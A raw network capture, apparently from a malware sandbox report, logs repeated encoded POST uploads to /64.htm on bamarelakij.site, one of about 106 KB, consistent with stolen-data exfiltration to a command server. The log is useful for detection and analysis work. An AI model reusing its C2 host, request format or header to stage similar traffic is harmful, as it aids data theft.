2025-01-09 13:41:12 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=62d05063e542493bb6ba88091abba958&HASH=62d0&LV=202501&V=4&LU=1736430072777; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:41:12 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=150bd44fd90347b9901c22b6a1840b72; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:11:12 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1785 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Thu, 09 Jan 2025 13:41:12 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:41:14 UTC	407	OUT	POST /64.htm?hkv47kov=jujLeecKnLDxH4%2Fn3Gf%2FcLOXX1VHlofmE6nbrKOrHhL4GuQ5YkbXRU4eMxxn6chYW44JbQRqTNknnCoZoJ5qDg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 x: PuwyymoQi+JtPN4ute+6ODpPd+ApSWsY9IWQJs6G8Wi2/wA3/Nkcmc/Wio/7MyGLdkzTj8aV5zw Content-Length: 53 Host: bamarelakij.site
2025-01-09 13:41:14 UTC	53	OUT	Data Raw: 00 00 00 00 fd ff ff ff 00 00 00 00 03 00 00 00 92 00 03 00 00 00 00 fe ff ff ff 00 00 00 00 02 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2025-01-09 13:41:14 UTC	750	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 13:41:14 GMT Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFzF58bEeFbFuc6xyQzNnNcUzvvpn3Kmn6%2FKzu3BWz15F9KOAv2niRY91UBqezDxtQKEOm%2BOh0YigGxW6lo%2F%2Bsr3Papn1D0599P6O3YpdSMMP01vnBrOxrB4H8bfJeF2uWF5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4d7fb8bac0cc2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1700&rtt_var=660&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1096&delivery_rate=1631284&cwnd=176&unsent_bytes=0&cid=02b58cc2b3617a0e&ts=332&x=0"
2025-01-09 13:41:14 UTC	29	IN	Data Raw: 31 37 0d 0a 00 00 00 00 fe ff ff ff 00 00 00 00 07 00 00 00 91 91 ce 1a a0 9d bc 0d 0a Data Ascii: 17
2025-01-09 13:41:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:41:30 UTC	411	OUT	POST /64.htm?hkv47kov=jujLeecKnLDxH4%2Fn3Gf%2FcLOXX1VHlofmE6nbrKOrHhL4GuQ5YkbXRU4eMxxn6chYW44JbQRqTNknnCoZoJ5qDg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 x: PuwyymoQi+JtPN4ute+6ODpPd+ApSWsY9IWQJs6G8Wi2/wA3/Nkcmc/Wio/7MyGLdkzTj8aV5zw Content-Length: 106564 Host: bamarelakij.site
2025-01-09 13:41:30 UTC	15331	OUT	Data Raw: 00 00 00 00 fd ff ff ff 00 00 00 00 03 00 00 00 92 00 01 95 00 00 00 e8 96 ef 00 08 00 00 00 b9 49 01 00 45 ab c5 66 71 e3 95 29 00 00 00 00 74 4b f7 00 00 00 00 00 eb 01 00 00 c9 60 48 49 4c 60 48 53 a1 34 39 b7 b6 b2 ec 1a a1 1d 2e aa b9 b2 39 b9 2e 35 b7 37 b2 b9 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 c8 cc 60 48 d3 22 b2 33 b0 ba 36 3a ec 1e a1 1d 2e aa b9 b2 39 b9 2e 35 b7 37 b2 b9 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 2e 22 b2 33 b0 ba 36 3a ec 1a b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 2e a1 34 39 b7 b6 b2 2e 38 39 b7 33 b4 36 b2 b9 2e 22 b2 33 b0 ba 36 3a 2e 26 b7 b3 b4 37 10 22 b0 3a b0 Data Ascii: IEfq)tK`HIL`HS49.9.57.88":.&6.6.49.9":`H"36:.9.57.88":.&6.6.49.9":."36:49199.49.8936."36:.&7":
2025-01-09 13:41:30 UTC	15331	OUT	Data Raw: de 5d 60 66 2d 42 f5 40 44 aa 2b f1 83 6b 82 be 02 fb 12 0e 0a b0 ae 1a 02 c9 7d eb bb 24 5f 21 36 1e 3d 95 74 6c 23 93 dc 4b ae ac 63 d8 2e 42 28 ec 3d 29 0b 22 4b 68 0d b0 34 65 2d 41 25 5e 58 a6 79 d6 ae 2b f5 0a ee 6f 1d 9a 1f 18 a6 ab ab 1b e1 92 62 7b 59 dd e9 5a 00 45 ff 88 6b 83 50 79 f7 cb 52 ec 46 0f 0c 1f c5 3a 05 90 28 6d 35 72 59 cc e6 c8 42 59 af 0f 23 1e 4b 31 a9 f4 05 bd 1e 31 d9 f5 0d 34 57 2f 63 7a c1 3d 25 09 b9 1e 68 e1 84 85 be a1 c7 96 07 27 7e d6 ce 84 af ae a8 f2 26 3c ba 5f a1 e4 78 f9 84 24 6e ee 9f 2c 3f f9 6d 56 47 2b ce b0 d3 83 28 24 6f 40 82 42 35 0e 8e 47 96 e1 2b c2 26 8d bc cb 7b ca a3 90 55 7b f0 8f e6 e0 6f e0 c1 34 b6 d1 3b b3 6b f2 14 b2 ad 80 90 87 3f 7b f1 a1 6e af c1 70 8c dd 78 3e b2 4a ba a8 72 42 03 31 e7 b1 34 Data Ascii: ]`f-B@D+k}$_!6=tl#Kc.B(=)"Kh4e-A%^Xy+ob{YZEkPyRF:(m5rYBY#K114W/cz=%h'~&<_x$n,?mVG+($o@B5G+&{U{o4;k?{npx>JrB14
2025-01-09 13:41:30 UTC	15331	OUT	Data Raw: a7 4e f7 1f 20 30 16 4c c3 95 72 68 fe c4 ac 50 e3 c7 d2 7b 2b aa 64 f2 25 00 11 e0 d7 46 92 c5 6d 54 8f 0e f4 54 da 53 36 af 94 2b a9 bf 63 7f 35 1f 1f e0 d8 33 bd e5 95 4e 2d 94 40 f6 35 00 b5 bf a5 de 93 03 1f 8a 5d e9 ca da 53 ca f7 3d 70 13 5c d5 a5 54 6e ba e9 b8 97 2a e1 35 64 1c a0 27 21 9c f5 c1 79 c0 83 94 66 e7 95 16 a5 d2 a0 96 ab d3 f9 24 52 9b 09 21 03 4a 27 e9 2c 3e 9d 7d 98 1e 93 93 77 b1 90 f8 51 9e 31 89 5f b5 74 bc 47 9f 43 bb 99 03 ee 68 f7 dc 7a ba a7 68 5b 3c 72 86 69 61 e3 1a 75 8e 49 63 e5 40 27 c4 fc f2 53 c3 27 f4 dc 2b de 20 1a bb c0 59 de 24 1e bb 1d d2 80 f3 20 14 05 ab 9e ed d6 f7 26 82 b8 10 a3 91 45 07 5b 76 67 aa 0a d8 52 9a bb 18 cd d1 da 1e d4 2f a7 ec 36 0a 80 cc b8 b9 6f 72 a1 8b f3 48 19 1b 13 c0 3e b8 45 c8 33 57 eb Data Ascii: N 0LrhP{+d%FmTTS6+c53N-@5]S=p\Tn*5d'!yf$R!J',>}wQ1_tGChzh[<riauIc@'S'+ Y$ &E[vgR/6orH>E3W
2025-01-09 13:41:30 UTC	15331	OUT	Data Raw: d6 b6 63 d1 c3 cd 2d 8e c9 ea b1 c8 e8 28 52 90 f2 83 08 48 86 54 3c 24 9f 15 76 b3 9d 93 06 07 9a e6 c8 98 30 f8 48 3f 6c 0a 91 e7 ea d7 61 8a e9 80 38 38 55 b0 4f 46 80 47 87 76 d1 3d 1a 57 24 0d 07 18 52 45 7a 13 d8 29 57 19 62 9b 2e 1d a9 65 50 f8 3c 5c 13 9e 87 b8 49 6a 47 0b 42 4b fd 26 81 11 1b da 21 8f 87 b1 7c 65 e8 e1 93 ab e6 e4 da db 21 6a cd 1c 3e f8 cb 61 fe ff 77 64 c6 82 1d 92 74 c6 bc 11 e8 cd 61 0c 77 b9 3a 58 6c eb 39 de 8c 56 f0 3f 93 87 e5 3e 9a df 4b 7f 06 d0 9b 6b 44 42 8f 45 be dc e7 14 10 31 ae 95 7a f0 18 43 8b 0c 9e 1e 7b ea 1e ed 3d a5 42 ef c4 e1 38 bf e4 f9 82 1d 96 74 c6 b2 11 e8 dd 61 0c 4f f9 3a 58 5c 69 39 be 0d 56 f0 bd 93 87 93 be 9a 83 cb 7f 16 50 9b 5b 04 4e 8f 05 35 dc e7 19 10 31 33 96 7a 5d 58 43 ed 0d 1e 26 3b 4b Data Ascii: c-(RHT<$v0H?la88UOFGv=W$REz)Wb.eP<\IjGBK&!\|e!j>awdtaw:Xl9V?>KkDBE1zC{=B8taO:X\i9VP[N513z]XC&;K
2025-01-09 13:41:30 UTC	15331	OUT	Data Raw: b6 b1 3c 4e 89 a3 1f 60 96 59 e1 d6 64 db 5c a2 2b 96 16 22 f7 75 4e 74 86 df 68 d5 6c 34 c9 b6 35 c9 b6 5b 27 fb 7d de 8f 3d 99 49 05 a0 cc d9 e6 3b a4 12 06 ed e7 f7 0b c3 61 b5 f6 49 27 df 89 37 1f 2c dd a5 1d c8 8f a7 98 5d b5 c7 ef c4 db 6b 67 73 7d f0 c2 1f ff de a9 8c 18 84 6a d3 18 6e 93 c6 5b bd 4d 02 a7 b1 e9 9f 61 6f bc 49 74 34 5f 33 d2 d9 33 f1 4b b7 8f 26 21 62 98 4c a4 26 ee 8f 70 8c f9 e6 b0 e2 bf 6b 9e 37 92 96 3b 1b eb 87 95 51 a0 82 9b 49 45 10 d9 f1 d8 2a 84 a3 da 5f a7 a6 ec 27 2d 37 0e f5 1f d0 53 36 e3 26 ed 42 5b 6d a8 8f a7 6c 3f 72 f5 07 95 17 b3 03 88 11 16 de 37 29 cd 1c 41 19 a3 7a 6f f5 cc 7c ea 5f ea 99 1c 16 90 42 63 23 8a 2a 7c c3 d8 9f 8f a9 23 c7 23 ca 6c 39 87 00 60 18 68 8c cf 20 f3 ea 69 6d 3c d4 28 16 ca 45 e2 21 58 Data Ascii: <N`Yd\+"uNthl45['}=I;aI'7,]kgs}jn[MaoIt4_33K&!bL&pk7;QIE_'-7S6&B[ml?r7)Azo\|_Bc#\|##l9`h im<(E!X
2025-01-09 13:41:30 UTC	15331	OUT	Data Raw: bd 59 37 36 cf 1d 38 21 01 8c 59 be 77 23 65 2a 02 c1 49 d2 1f fe 32 4d cb ff 33 5b 81 06 75 f9 d7 cf 94 6f e4 c1 6d d4 dd da 8a 03 0f da c2 76 07 67 33 19 28 af 9c 5e e1 21 8c 87 c3 e6 5a 18 72 19 07 c9 fc 9e 43 92 b4 0b 3e 0d 5a 14 b9 31 bb 78 8a 31 e8 0e 4e 7c f7 fa 15 91 04 a2 bd 1e 2f 46 35 0b 0b 6f e0 99 d5 a2 04 fc 95 f2 44 fd 82 3b f2 f4 5d e0 e7 8e 6c ec 79 d1 4f 69 f5 79 aa 97 3e 77 2a ee 04 6b 07 2e 32 f0 a4 22 ac 37 b0 fe b9 5c ff 87 00 00 28 9e 0c ff 80 00 00 55 83 fc ff 80 00 00 55 83 eb ff 00 00 00 ea 99 a7 04 e8 7a f7 89 fe fd 25 90 00 00 00 5e bb 1e 7c 28 f6 72 c1 e4 df ff 8d 1e 43 79 76 85 a3 c9 f8 ff 83 22 ff c0 09 83 00 00 00 f7 92 87 6a 27 35 75 8b 40 c3 38 ff 8f 00 00 50 3d 78 f7 ff 00 00 00 55 83 eb ff 00 00 00 ea c1 f5 bf 00 00 40 Data Ascii: Y768!Yw#eI2M3[uomvg3(^!ZrC>Z1x1N\|/F5oD;]lyOiy>wk.2"7\(UUz%^\|(rCyv"j'5u@8P=xU@
2025-01-09 13:41:30 UTC	14578	OUT	Data Raw: 90 6a 10 7e 78 c5 f2 fd af 62 07 8c 73 11 a7 54 89 eb 3e f2 7e b6 df 59 52 b8 f3 6c 9d 5b 03 87 ec 5c 78 3c a1 ae c3 76 e1 f2 3b 49 f2 45 79 ee fa b9 d5 c7 67 18 2b ea df 7d be 21 10 88 39 f4 62 e7 f0 ac f1 c2 8c 76 fc ca ef 9e 95 6f b3 88 9a ba 6b de 07 2b 0d 8b cd 5e 18 85 f3 58 e9 95 7d cb 7b 7e be a1 aa df f8 19 f8 7e c2 72 ee 95 ac 5d fe 0e c1 3a 12 52 d0 fd 6e f6 e5 6b 66 1b a4 9a 07 c6 f7 4f e8 57 52 76 dc 5c 50 70 7e b0 d9 b6 8e 5c f0 be f5 93 9e cb 9f d6 6e 9c 33 a8 45 cf e7 12 79 a6 6f f2 e4 e3 5e a7 87 7c d6 3d 47 fc fc c5 c7 1b 9a 05 d5 b5 dd 23 b6 97 07 4f 3e 1b f3 77 c9 78 8b bb 87 23 96 77 b6 6a 08 58 de 7c f8 71 71 68 21 ab e4 b7 bb 77 d7 7b 2f a3 2e 45 55 75 94 ae 9e c2 dd 6b b9 3b d8 b4 6f 6d 7d db 93 ed 67 b8 b2 ea 56 7a 4f 2d 78 af 2e Data Ascii: j~xbsT>~YRl[\x<v;IEyg+}!9bvok+^X}{~~r]:RnkfOWRv\Pp~\n3Eyo^\|=G#O>wx#wjX\|qqh!w{/.EUuk;om}gVzO-x.
2025-01-09 13:41:31 UTC	821	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:41:31 GMT Connection: close ews: PuwyymoQi+JtPN4ute+6ODpPd+ApSWsY9IWQJs6G8Wi2/wA3/Nkcmc/Wio/7MyGLdkzTj8aV5zw cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62%2BAPX2ZfdRguVi9%2Bc2EoqbeNXyxpMYTSyIUGVOc5AWqEJ2VvvryQiYCn1uj0RdrP%2B1LY8yV0%2Fmtg9D1yVd%2FOj%2B6wJP06uO2S5JULJWwuUUinWw2NyoABNeCNrV56Vl%2FrWfi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4d861abfd41f9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1605&rtt_var=610&sent=42&recv=114&lost=0&retrans=0&sent_bytes=2837&recv_bytes=107897&delivery_rate=1782661&cwnd=216&unsent_bytes=0&cid=593c685d9b8f959a&ts=757&x=0"

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:41:32 UTC	408	OUT	POST /64.htm?hkv47kov=jujLeecKnLDxH4%2Fn3Gf%2FcLOXX1VHlofmE6nbrKOrHhL4GuQ5YkbXRU4eMxxn6chYW44JbQRqTNknnCoZoJ5qDg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 x: PuwyymoQi+JtPN4ute+6ODpPd+ApSWsY9IWQJs6G8Wi2/wA3/Nkcmc/Wio/7MyGLdkzTj8aV5zw Content-Length: 212 Host: bamarelakij.site
2025-01-09 13:41:32 UTC	212	OUT	Data Raw: 00 00 00 00 fd ff ff ff 00 00 00 00 03 00 00 00 92 00 01 95 00 00 00 e8 ae 27 24 08 00 00 00 99 00 00 00 45 ab c5 66 71 e3 95 29 00 00 00 00 74 57 93 12 00 00 00 00 83 00 00 00 c9 60 60 49 60 c8 00 00 00 00 00 74 57 93 12 00 00 00 00 31 00 00 00 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: '$Efq)tW``I`tW1(((
2025-01-09 13:41:32 UTC	814	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:41:32 GMT Connection: close ews: PuwyymoQi+JtPN4ute+6ODpPd+ApSWsY9IWQJs6G8Wi2/wA3/Nkcmc/Wio/7MyGLdkzTj8aV5zw cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bxn%2BtoAYWTf1Znw7AXd%2Fs%2FI9xvjvnfKxXslpk354eZgrjsgFzlOmFCKuzZqnPOSguirnSIbE9%2BSTvAOS4nzWcJjZDcEilzxf3oBW%2BrPaEIEZElvNrkEpRrFA9ZTBUjs0KLPI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4d8701a7e431c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1590&rtt_var=618&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1256&delivery_rate=1741204&cwnd=237&unsent_bytes=0&cid=c0e31bcab37b22d1&ts=245&x=0"

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:41:33 UTC	408	OUT	POST /64.htm?hkv47kov=jujLeecKnLDxH4%2Fn3Gf%2FcLOXX1VHlofmE6nbrKOrHhL4GuQ5YkbXRU4eMxxn6chYW44JbQRqTNknnCoZoJ5qDg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 x: PuwyymoQi+JtPN4ute+6ODpPd+ApSWsY9IWQJs6G8Wi2/wA3/Nkcmc/Wio/7MyGLdkzTj8aV5zw Content-Length: 380 Host: bamarelakij.site
2025-01-09 13:41:33 UTC	380	OUT	Data Raw: 00 00 00 00 fd ff ff ff 00 00 00 00 03 00 00 00 92 00 01 95 00 00 00 e8 3b 7f 3c 08 00 00 00 95 00 00 00 45 ab c5 66 71 e3 95 29 00 00 00 00 74 9d bf 1e 00 00 00 00 81 00 00 00 49 60 48 00 00 00 00 74 9d bf 1e 00 00 00 00 31 00 00 00 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 95 00 00 00 38 80 ca 11 08 00 00 00 94 00 00 00 45 ab c5 66 71 e3 95 29 00 00 00 00 1c 40 65 88 00 00 00 00 01 00 00 00 c8 48 00 00 00 00 1c 40 65 88 00 00 00 00 31 00 00 00 28 a5 03 03 16 Data Ascii: ;<Efq)tI`Ht1(((8Efq)@eH@e1(
2025-01-09 13:41:33 UTC	808	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:41:33 GMT Connection: close ews: PuwyymoQi+JtPN4ute+6ODpPd+ApSWsY9IWQJs6G8Wi2/wA3/Nkcmc/Wio/7MyGLdkzTj8aV5zw cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tEbD6NkBtyHSjD5NXoTAyBy5VXEEAp1TXvCbFUCIdVhS%2B1MioqNYnXz6z7ewgllR6zTSmggR5kIM0tcvLz9kDCw%2Bm3p4Y%2BR95k4vKeUyLCXLn2ifD3nlHGPxWolxdpUTRl7e"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4d874fd1b8c65-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2067&min_rtt=2033&rtt_var=786&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1424&delivery_rate=1436301&cwnd=204&unsent_bytes=0&cid=76dd83d8aedb36e5&ts=319&x=0"

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:41:34 UTC	410	OUT	POST /64.htm?hkv47kov=jujLeecKnLDxH4%2Fn3Gf%2FcLOXX1VHlofmE6nbrKOrHhL4GuQ5YkbXRU4eMxxn6chYW44JbQRqTNknnCoZoJ5qDg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 x: PuwyymoQi+JtPN4ute+6ODpPd+ApSWsY9IWQJs6G8Wi2/wA3/Nkcmc/Wio/7MyGLdkzTj8aV5zw Content-Length: 14825 Host: bamarelakij.site
2025-01-09 13:41:34 UTC	14825	OUT	Data Raw: 00 00 00 00 fd ff ff ff 00 00 00 00 03 00 00 00 92 00 01 95 00 00 00 6e 96 bf 0f 08 00 00 00 ae 39 00 00 45 ab c5 66 71 e3 95 29 00 00 00 00 37 4b df 87 00 00 00 00 02 00 00 00 c9 60 00 48 00 00 00 00 37 4b df 87 00 00 00 00 3d 9c 00 00 28 a5 81 02 96 00 00 04 04 00 bc 0a 84 ac 5d f5 de 82 ff ff ff ff ff ff ff ff 0d 00 0a 00 a3 39 b0 31 31 b2 39 2e 32 b2 b9 2e 22 2b ab 24 a5 a6 27 23 27 27 17 35 38 b3 80 00 08 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 80 01 02 fe fd 22 2b ab 24 a5 a6 27 23 27 27 a9 2c 29 28 23 29 23 a9 2b 2b a1 a8 28 2c a9 a5 ab 24 a5 28 25 25 24 ac a8 ab ac ac 23 a7 27 a0 25 a8 a9 a1 a7 24 2d a0 22 21 24 aa a7 ab a7 a9 28 22 2b a0 a7 a4 a8 2b a7 21 24 a3 a6 a4 a2 27 2d a8 2d 26 a0 21 ac 22 a5 ab 2c a3 a9 aa a8 27 a9 a2 a4 27 a4 Data Ascii: n9Efq)7K`H7K=(]9119.2."+$'#''58"+$'#'',)(#)#++(,$(%%$#'%$-"!$("++!$'--&!",''
2025-01-09 13:41:35 UTC	810	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:41:35 GMT Connection: close ews: PuwyymoQi+JtPN4ute+6ODpPd+ApSWsY9IWQJs6G8Wi2/wA3/Nkcmc/Wio/7MyGLdkzTj8aV5zw cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=42Fsxv38fGUjFOv0PUgJ60kI%2BewRczZpKHvoGVaLgTlLYjNnXRO8AgRRraEQ2pgZmSK6YSVJQvmmu9f1yfD%2BuqH%2BEQeQ3HxZGxjQdPMpATsUFwhkrlYhGzFYlmH66ayg4Kcg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4d87c79c92365-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1904&min_rtt=1899&rtt_var=723&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15893&delivery_rate=1502830&cwnd=154&unsent_bytes=0&cid=63951a9c11a8b464&ts=319&x=0"